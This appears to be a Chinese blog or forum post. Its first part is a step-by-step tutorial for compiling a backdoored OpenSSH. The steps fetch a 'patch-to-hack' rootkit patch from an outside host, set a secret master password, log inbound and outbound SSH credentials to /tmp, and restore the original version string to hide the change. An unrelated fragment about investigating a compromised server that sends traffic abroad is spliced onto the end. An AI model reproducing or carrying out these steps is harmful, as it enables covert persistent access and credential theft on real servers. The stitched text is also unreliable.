标题党了,呵呵
其实就是个ssh后门,基本可以不用看内核版本,很简单,为照顾新手!
*************************************************************************
地址在这http://core.ipsecs.com/rootkit/patch-to-hack/(已被墙)
我以 openssh 5.9centos 5.6 做演示
在这里找到对应的openssh版本 http://openbsd.org.ar/pub/OpenBSD/OpenSSH/portable/
安装前首先
ssh -V
记录下原来ssh版本信息,免得安装后一看就版本不一样了
wget http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz
wget http://openbsd.org.ar/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz
tar zxvf openssh-5.9p1.tar.gz
tar zxvf 0x06-openssh-5.9p1.patch.tar.gz
cd openssh-5.9p1.patch/
cp sshbd5.9p1.diff ../openssh-5.9p1
cd ../openssh-5.9p1
patch <sshbd5.9p1.diff //patch 后门
vi includes.h //修改后门密码,记录文件位置,
/*
+#define ILOG "/tmp/ilog" //记录登录到本机的用户名和密码
+#define OLOG "/tmp/olog" //记录本机登录到远程的用户名和密码
+#define SECRETPW "123456654321"//你后门的密码
*/
vi version.h //修改ssh版本信息,改成原来的
先安装所需环境不然会报错
yum install -y openssl openssl-devel pam-devel
./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5
注意要是出现:configure: error: *** zlib.h missing – please install first or check config.log
需要安装zlib
yum install -y zlib zlib-devel// http://sourceforge.net/projects/libpng/files/zlib/1.2.3/zlib-1.2.3.tar.gz/download 需要 make clean
make &&make install
service sshd restart //重启sshd
然后我们登录ssh看看
再ssh localhost看看
使用后门密码登录是不会被记录的
后门,记录一举两得,是不是很简单
阿里论坛有一篇肉鸡类问题排查思路的文章,按照上面的思路找了找
没发现异常登录,没有头绪。
可以通过tcpdump命令进行抓包,我将抓取的数据存入一个文件之后进行观察
抓包文件可以通过一些工具进行分析,我用Wiresherk查看了一下,发现服务器不断向美国、香港等服务器发包。
但是仍没有进攻行为,还是没能找到程序所在。
当下做了个决定,既然暂时找不到,就先封锁他的行为吧。
这样一定程度上阻止了异地的访问
重启服apache务器,这样恶意发的包就发不出去,带宽占用又降回正常了。
但是病毒文件还是没有找到,仍在排查。
阿里论坛有一篇防止PHPDDOS攻击的文章
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)